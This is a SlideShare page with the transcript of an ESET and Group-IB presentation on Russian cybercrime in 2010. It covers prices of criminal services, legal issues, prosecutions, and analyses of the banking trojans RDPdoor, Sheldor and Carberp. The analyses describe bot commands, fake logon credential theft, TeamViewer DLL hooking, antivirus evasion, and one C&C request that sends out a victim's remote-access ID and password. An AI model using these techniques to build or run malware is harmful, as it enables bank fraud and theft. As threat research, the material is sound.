Cybercrime in Russia: trends and issues

  • 1,765 views
Uploaded on

Les tendance du cybercrime russe en 2010

Les tendance du cybercrime russe en 2010

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
1,765
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
19
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Cybercrime in Russia: Trends and issues Robert Lipovsky, Aleksandr Matrosov and Dmitry Volkov
  • 2. This presentation is confidential and not subject to public disclosure
  • 3. AgendaGeneral cybercrime trends in 2010Most prevalent threats and incidentsReasons for the incidents’ growthEvolution of the cash-out schemeLegal evasions and loopholesSuccessful criminal prosecutionsAnalysis of malware used in the attacks
  • 4. Group-IBoFirst and only public company in Russia engaged in digital crime investigation and computer forensics consultingoEstablished in 2003o Assistance to law enforcement authorities on particularly difficult caseso Partners and researchers in 48 countrieso Russian HoneyPot-Net projecto 24/7 monitoring and incident response
  • 5. Cybercrime in 2010Global computer crime market turnover at7 billion dollarsShare of cybercriminals living in Russiaestimated at 1.3 billion dollars ~19% ofglobal crimeCybercriminals from Russian speakingcountries: 2.5 billion dollars ~36% ofglobal crime *research report "The Russian cybercrime market in 2010: status and trends” http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
  • 6. Most prevalent threats and incidents1. Fraud targeted at Russian banks and payment systems2. SMS fraud using premium numbers(“winlockers”/LockScreen trojans)3. DDoS attacks – Growth in number and in power4. Unauthorized access to sensitive corporate information *research report "The Russian cybercrime market in 2010: status and trends” http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
  • 7. Incident statistics by Group-IB forensic lab 1000 931 900 800 700 Share of cybercriminals living in Russia 586 600 estimated to increase to 2009 500 400 1.8 billion dollars in 2011 2010 300 (vs. 1.3 billion213 2010) in 200 124 72 92 100 60 30 0 unauthorized brand attacks DDoS bank fraud access SMS fraud (LockScreens) not shown because the numbers are disproportionally greater
  • 8. DDoS attacks: Growth in number and power attackers DDoS bank if transaction exceeds 150 000 $ most powerful attack 100 Gb/sec (victims: UkrTelecom, Yandex, EvoSwitch but real target was a dating affiliate program)
  • 9. SMS fraud using premium numbers:LockScreen malwareo If your country is affected, please, contact us for informationo Group-IB developed a case-tutorial for this type of investigation
  • 10. Reasons for the incidents’ growtho Legal evasions and loopholeso Low cost of services in Russiao Lack of legal jobs for young IT- specialistso High profit and minimum investments from cybercrimeo Low information security vs. high cybercrime groups activitieso Shift of attack targets back to USSR :)
  • 11. Cost of services in Russia Hacking of a website: from $50 Guaranteed hack of a mailbox (Yandex, Mail, Rambler, Gmail): from $45 Mobile phone bug: from 5000$ SMS service bug: from 1000$ Massive distribution of Trojan and spyware: from 20$ (1000 users) Spam services: o 400,000 companies - $55 o 1,800,000 private persons - $100 o 90,000 companies in St. Petersburg - $30 o 450,000 private persons in Ukraine - $50 o 6,000,000 private persons in Russia - $150 o 4,000,000 emails on @mail.ru - $200
  • 12. Evolution of the Cash-out scheme For amounts up to 40k $
  • 13. Evolution of the Cash-out scheme For amounts 40-200k $
  • 14. Evolution of the Cash-out scheme For amounts over 200k $
  • 15. Chapter 28 of the Penal Code Article 272. Article 273. Article 274. Illegal Access to Development, Use and Violation of Rules for Computer Information Spreading of Malicious the Operation of Software Computers, Computer Systems or Their Networks Criminal responsibility Maximum fine of 300 000 RUB Imprisonment for up to Imprisonment for up to or 7 years 4 years imprisonment for up to 5 years.
  • 16. Legislative initiativesThe Committee against Cyber-Crime at theRussian Association of ElectronicCommunication (RAEC)Improvement of Russian legislation in thefield of cyber crimesAnti-SPAM legislationSupport against online child pornography
  • 17. Successful criminal prosecutionso Group-IB, Economic Crimes Division and Dept K MVD busted a group of cybercriminals who developed and spread the “LockScreen” malwareo 10 cybercriminals have been arrested
  • 18. Successful criminal prosecutions Leo Kuvaev case (BadCow)
  • 19. Successful criminal prosecutions Leo Kuvaev case (BadCow)
  • 20. Successful criminal prosecutions DDoS case (Cxim)o Provided DDoS as a serviceo Arrested for DDoS against Russian bankso 8 months in jail
  • 21. Successful criminal prosecutions Russian bank-fraud caseGroup #1 o stole 600 000$ in a single transaction o case in court o used Win32/Sheldor Group #2 o stole 832 000$ (over 1 month) o case in court o used phishing sites (hosted on Gogax)
  • 22. Interesting facts about Russian bank fraud • Mass distribution since 2009 1 • Six cybercrime groups attacking Russian banks 2 • Maximum amount stolen at one time from single bank account: 14 814 820$ 3
  • 23. Interesting facts about Russian bank fraud These guys are still free!
  • 24. Analysis of malwareused in the attacks on Russian Internet Banking systems
  • 25. Overview2010: year of attacks on Russian banks• number of incidents has more than doubled compared to 2009*Over 95%* of incidents involve banking trojansMalware tailored to Russian banks and paymentsystemsHowever!• Can (and IS) used in other countries as well *research report "The Russian cybercrime market in 2010: status and trends” http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
  • 26. Malware family share by incidents (%)*(in the last 6 months) 40 30 20 10 0 *as investigated by Group-IB
  • 27. Most prevalent banking malware in Russia Malware Family Description Win32/RDPdoor Backdoor; uses MS Remote Desktop; botnet Win32/Sheldor Backdoor; abuses the TeamViewer application; botnet Win32/Carberp Universal trojan with modules for targeted attack on Russian banks; botnet Win32/Hodprot Downloader; installs other malware modules; strong encryption of its C&C protocol Win32/Qhost Malware that modifies the hosts file
  • 28. Win32/RDPdoor
  • 29. Stealing money using MS Remote Desktop…Win32/RDPdoor overview Appearance: First samples detected in April 2010 Cost: ~ 2.000$ Key feature: Abuses components of Thinsoft BeTwin for RDP • Most prevalent banking trojan in Russia • Bypassing advanced security mechanisms (Smartcards, etc.)
  • 30. Win32/RDPdoor detection statistics by countryCloud data from ThreatSense.Net April 2010 – March 2011 Russia Ukraine Kazakhstan Belarus Thailand Bulgaria United States Israel Moldova Rest of the world
  • 31. Win32/RDPdoor installation infected Win32/RDPdoorcomputer C&C run dropper and send system information 1 authentication on C&C and provide Thinsoft BeTwin for installation 2 send status information 3
  • 32. Win32/RDPdoor installation
  • 33. Win32/RDPdoor installation
  • 34. Stealing authentication data1. Install GINA extension DLL2. Display fake logon screen3. Capture user name & password4. Send to C&C
  • 35. Win32/RDPdoor bot commands Bot Command Description “P” change password for BeTwin terminal session “B” reinstall BeTwinServiceXP module “S” administration of BeTwin terminal session “R” install BeTwinServiceXP module “T” BeTwin backconnection initialization “U” update main modules and configuration
  • 36. Win32/RDPdoor bot commands
  • 37. Win32/RDPdoor updatingNew dropper with a new configuration embedded is received after „U‟command
  • 38. Win32/Sheldor
  • 39. Win32/Sheldor overview Appearance: First samples detected in June 2010 Cost: ~ 2.500$ Key feature: Abuses the TeamViewer application for remote access • Using the TeamViewer cloud adds another level of anonymity
  • 40. Win32/Sheldor detection statistics by countryCloud data from ThreatSense.Net April 2010 – March 2011 Russia Ukraine Kazakhstan Moldova United States China Belarus Israel Georgia Rest of the world
  • 41. Win32/Sheldor and TeamViewer in action1. Request cloud ID2. Set cloud ID3. Send ID to C&C TeamViewer4. Malicious connection cloud 1 2 infected 4 computer Win32/Sheldor 3 GET C&C /getinfo.php?id=414%20034%20883&pwd =6655&stat=1
  • 42. Win32/Sheldor and TeamViewer in action1. Request cloud ID2. Set cloud ID3. Send ID to C&C4. Malicious connection GET /getinfo.php?id=414%20034%20883&pwd =6655&stat=1
  • 43. Under the hood: DLL hooking TeamViewer.exe TV.dll (proxy DLL) TS.dll (original TS.dll)
  • 44. Malicious DLL call graph
  • 45. Malicious DLL decompilation Functions for calling from original TS.dll Load original TS.dll Hook functions C&C URL
  • 46. Win32/Sheldor bot commands Bot Command Description exec download and ShellExecute/CreateThread additional module monitor_off send command “stop monitoring” to C&C monitor_on send command “start monitoring” to C&C power_off ExitWindowsEx(EWX_POWEROFF, SHTDN_REASON_MAJOR_OPERATINGSYSTEM) shutdown ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_OPERATINGSYSTEM) killbot delete all files, directories and registry keys
  • 47. Sheldor C&C panel
  • 48. Win32/Carberp
  • 49. Win32/Carberp overview Appearance: First samples detected in February 2010 Cost: ~ 9.000$ Key feature: Advanced information stealing trojan with plug-ins • Customizable to specific banks • Man-in-the-browser attacks (IE, FireFox) • Grand Theft: Real cases with millions of $$$ stolen
  • 50. Win32/Carberp detection statistics by countryCloud data from ThreatSense.Net April 2010 – March 2011 Russia Ukraine Spain United States Turkey Kazakhstan Italy Mexico Thailand Netherlands Argentina Belarus Greece United Kingdom Rest of the world
  • 51. C&C panel: Bots by country
  • 52. Win32/Carberp detections over time in RussiaCloud data from ThreatSense.Net April 2010 – March 2011
  • 53. Win32/Carberp bot commands Bot Command Description update Download new version of Carberp dexec/download Download and execute PE-file kill_bot/killuser • Delete trojan from the system • Delete users Windows account (latest version) startsb/loaddll Download DLL and load into trojans memory address space grabber Grab HTML form data and send to C&C
  • 54. Win32/Carberp self-protectionSelf-protect method Win32/Carberp.W Win32/Carberp.XBypassing AV-emulators many calls of GUI WinAPI many calls of GUI functions WinAPI functionsCode injection method ZwResumeThread() ZwQueueApcThread()Command and string custom encryptionencryption  algorithmBot authentication on C&C file with authentication  data stored on infected PCAPI function encryption custom encryption custom encryption algorithm algorithmDetection of AV hooks comparison of the first comparison of the first original bytes original bytesBypassing static AV adds random junk bytes to adds random junk bytessignatures dropped files to dropped filesHiding in the system hook system functions hook system functions
  • 55. Win32/Carberp distribution channels Direct distribution Distribution via partners control “partnerka” affiliate ID panel (affiliate program) exploit pack • BlackHat SEO • Infected Blogs • etc
  • 56. Win32/Carberp botnet control panel
  • 57. Win32/Carberp control panel – Bank settings
  • 58. Cab-files with stolen data
  • 59. Stolen data: BS-Client IB system
  • 60. Stolen data: CyberPlat payment system
  • 61. Stolen data: iBank IB system
  • 62. Stolen data: SberBank IB
  • 63. Stolen data: UkrSibBank IB
  • 64. Win32/Carberp SummaryCybercrime kit using multiple stealing techniquesSince early 2010 targeting other regions tooSeveral independent cybercrime groups involvedJoint investigation of Russian police, Group-IB andESET
  • 65. Summary Win32/RDPdoor Win32/Sheldor Win32/CarberpFirst appearance April 2010 June 2010 February 2010Cost 2000 $ 2500 $ 9000 $Prevalence Russia, Russia, Russia, Ukraine, Ukraine, Ukraine, Kazakhstan Kazakhstan Spain, USARemote Access RDP via ThinSoft Via TeamViewer Via plug-ins BeTwinInformation stealing manually manually automatedPlug-ins   Complexity   Botnet   
  • 66. Conclusion• Banks in other countries becoming new targets of Russian cybercrime groups• Attackers respond to new security measures with new methods to bypass them• Cybercriminals use stolen money to stay out of jail• Disabling C&C servers not enough to stop them• Only way of fighting them is by cooperation
  • 67. Questions
  • 68. Thank you for your attention ;) Robert Lipovsky, ESET lipovsky@eset.sk Aleksandr Matrosov, ESET matrosov@eset.sk @matrosov Dmitry Volkov, Group-IB volkov@group-ib.ru @groupib